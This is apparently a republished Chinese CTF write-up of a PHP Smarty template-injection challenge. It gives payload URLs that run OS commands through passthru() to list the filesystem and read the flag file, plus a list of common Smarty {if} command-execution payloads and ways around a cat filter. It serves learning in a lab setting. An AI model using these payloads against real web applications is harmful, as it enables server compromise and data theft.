聪明的php
2021/9/19 17:05:20
本文主要是介绍聪明的php,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
聪明的php
一、解题思路
1.根据题目提示
2.那么我们直接使用随便传入一个参数
http://114.67.246.176:18387/?a=1
3.传入参数,一般情况下是文件包含,或者命令执行,而这道题目比较新颖,使用的是php模板注入
4.根据测试2*4=8,确定是smarty
模板注入
测试phpinfo()
函数
http://114.67.246.176:18387/?a={if phpinfo()}{/if}
5.真的是百密一疏,过滤了好多的函数,好在没有把passthru()函数
过滤
http://114.67.246.176:18387/?a={if passthru("ls /")}{/if}
6.没有发现flag,但是发现_12016
文件,直接读一波,cat被过滤了,我是用的是more
http://114.67.246.176:18387/?a={if passthru("more /_12016 ")}{/if}
得到flag
flag{9fc0c291721a0b01e30ab0ec56f0165e}
二、知识点
1. 常用payload
smary中的{if}标签中可以执行的php语句
{if phpinfo()}{/if} {if system('ls')}{/if} {if readfile('/flag')}{/if} {if show_source('/flag')}{/if} {if system('cat ../../../../flag')}{/if}
2.passthru()函数
(PHP 4, PHP 5, PHP 7, PHP 8)
passthru
— 执行外部程序并且显示原始输出
语法:
passthru(string $command, int &$return_var = ?): void
同 exec()
函数类似, passthru()
函数 也是用来执行外部命令(command
)的。 当所执行的 Unix 命令输出二进制数据, 并且需要直接传送到浏览器的时候, 需要用此函数来替代 exec()
或 system()
函数。 常用来执行诸如 pbmplus
之类的可以直接输出图像流的命令。 通过设置 Content-type
为 image/gif
, 然后调用 pbmplus
程序输出 gif 文件, 就可以从 PHP 脚本中直接输出图像到浏览器。
3.cat绕过
可以使用其他函数如:less
、more
、tac
三、参考链接
passthru()函数
思路参考链接
这篇关于聪明的php的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-19php8的协程和hyperf的协程有什么区别?-icode9专业技术文章分享
- 2024-12-19php8 的fiber是什么?-icode9专业技术文章分享
- 2024-12-05怎么在php8,1 里面开启 debug?-icode9专业技术文章分享
- 2024-12-05怎么在php8,1 里面开启 debug?-icode9专业技术文章分享
- 2024-11-29使用PHP 将ETH账户的资产汇集到一个账户
- 2024-11-23怎么实现安卓+php 热更新方案?-icode9专业技术文章分享
- 2024-11-22PHP 中怎么实现判断多个值是否为空、null 或者为 false?-icode9专业技术文章分享
- 2024-11-11开源 PHP 商城项目 CRMEB 二次开发和部署教程
- 2024-11-09怎么使用php在kaufland平台刊登商品?-icode9专业技术文章分享
- 2024-11-05PHP的抽象类和接口是什么,有什么区别-icode9专业技术文章分享